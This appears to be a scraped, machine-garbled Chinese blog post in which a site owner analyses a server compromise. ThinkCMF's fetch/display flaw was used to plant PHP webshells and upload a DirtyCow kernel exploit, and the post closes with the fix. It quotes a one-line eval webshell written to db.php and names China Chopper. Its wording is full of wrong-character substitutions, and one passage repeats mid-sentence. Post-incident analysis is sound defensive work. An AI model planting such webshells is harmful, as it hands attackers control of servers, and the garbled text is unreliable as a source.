阿里云phpeval技巧_阿里云做事器被黑日记webshell植入原因分析和修复记录

早上起来第一件事便是刷本日新馆肺炎的数据，溘然手机短信收到提示，说我的网站存在webshell文件，危险等级为紧急，我意识到的我良久未曾掩护的网站被黑客攻破了。
立时行动，登录阿里云账号，果不其然，问题已经很严重了，植入了很多webshell，多达16个！

查了一下网站，做事器全体已经暴露了，暴露到什么程度呢？非常惨！
见下图：

这个是在我网站做事器下载下来的，在我的PC测试做事器上复现，基本上任何操作都可以进行，而且可以批量上传和修正webshell，webshell的名称都很暗藏。

其余，还有一个linux内核漏洞也被黑客攻陷，见下图：

个中，绿色的dirty.c便是针对linux内核漏洞的攻击文件，连源代码都传上来了，只须要编译即可，用户和用户组都是www，解释是通过webshell上传过来的。

其余，还有一个search.pl,这个紧张是搜索内核漏洞版本号的，以是这个黑客，实质上并不是来毁坏的我的数据的，而是提示我该打补丁了，顺便看一下search.pl的实行结果。

结果显示3.2版本的内核有两个补丁须要打上，也便是dirty.c对应的问题，这都是2013年的的问题了，呵呵。
但是听说dirtyc0w(脏牛）问题直到2016年才修复。
详细dirtyc0w的故事可以自行搜索，在此不表。

从上面的现状可以剖析出，黑客是先利用网站漏洞，植入webshell程序，获取做事器掌握权，然后再上传了针对内核漏洞的dirtyc0w脏牛的程序。
以是办理webshell问题的关键是要找出黑客是如何植入webshell的。
关于thinkphp的漏洞网上有很多，直接从网上搜索并不能确认黑客的攻击路径，那么改从何入手呢？logs，日志文件，日志文件记录了网站做事器的详细动作，因此从log文件是一个很好的方法。

下载log文件，最近有400多M字节，一条一条剖析是不大可能的，必须过滤掉无用信息，为此，我用python编写了几行代码，对log数据进行过滤。

对数据剖析创造，实在我的网站一贯在接管者各种各样的攻击，有很多是不堪利的，比如，返回状态包含400,403,404等这些都是无效攻击，做事器直接不理。
个中有效的必须是包含index.php的，因此必须把包含index.php的log保留,在此根本之上，再采撤消除法，把无用的信息去除，终极有用文件大小缩减为123Kbyte，数据是442行。
貌似可以开始了，但是442行数据验证起来也是很麻烦的，连续打消。

从网络查询可以知道，针对thinkcmf的攻击紧张是fetch函数和diplay函数的漏洞进行的，因此利用该漏洞就必须把fetch函数作为payload的一部分，因此不包含fetch函数的攻击也是无效的，加入一个剖断条件：必须包含fetch字符串。

在此运行python过滤器，终极得到5行有效数据。

剩下的就大略了，直接可以手工在测试环境中验证剩下的五条数据。
结果是第四条和第五条是正真成功入侵代码。
该代码可以直接在网站根目录下，天生一个名称为db.php的webshell文件，文件内容为

1<?php @eval($_P成一个名称为db.php的webshell文件，文件内容为

1<?php @eval($_POST["yu剩下的就大略了，直接可以手工在测试环境中验证剩下的五条数据。
结果是第四条和第五条是正真成功入侵代码。
该代码可以直接在网站根目录下，天生一个名称为db.php的webshell文件，文件内容为

1<?php @eval($_P成一个名称为db.php的webshell文件，文件内容为

1<?php @eval($_POST["yunfan"]);?>

这个文件被植入成功后，从浏览器访问可以返回1，从而确认db.php文件创建成功。

接下来就可以通过POST方法来注入其他程序，这种黑客工具就有很多了，比较著名的比如中国菜刀之类的工具等。
从紧接下来的log剖析就可以看出，黑客的动作可谓迅速，一分钟之内完成了所须要的动作，我的做事器彻底沦陷。
下图是log，post动作一分钟之内完成，而且还换了一个ip地址进行post操作

至此，全体过程就结束了，末了给网站打上补丁，将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的润色符改为 protected。

漏洞总是在利用过程中，一直被创造，因此及时理解所用系统的漏洞以及修补方案，及时打补丁才能担保长治久安。
其余，一样平常做事器都有相应的安全监控。
比如，这次阿里云就及时给我发了很多条信息，由于，这个做事器也不是很主要，没有及时处理。
如果是主要做事器，把稳根据自身情形选用平台供应的安全工具是很有必要的。
比如，定时备份镜以及安全软件等。

末了，感谢黑客们的专业精神，仅仅是进入了做事器，没有毁坏数据，办理问题的过程中，也让我这样的小白。
理解了网络安全的主要性和安全知技能。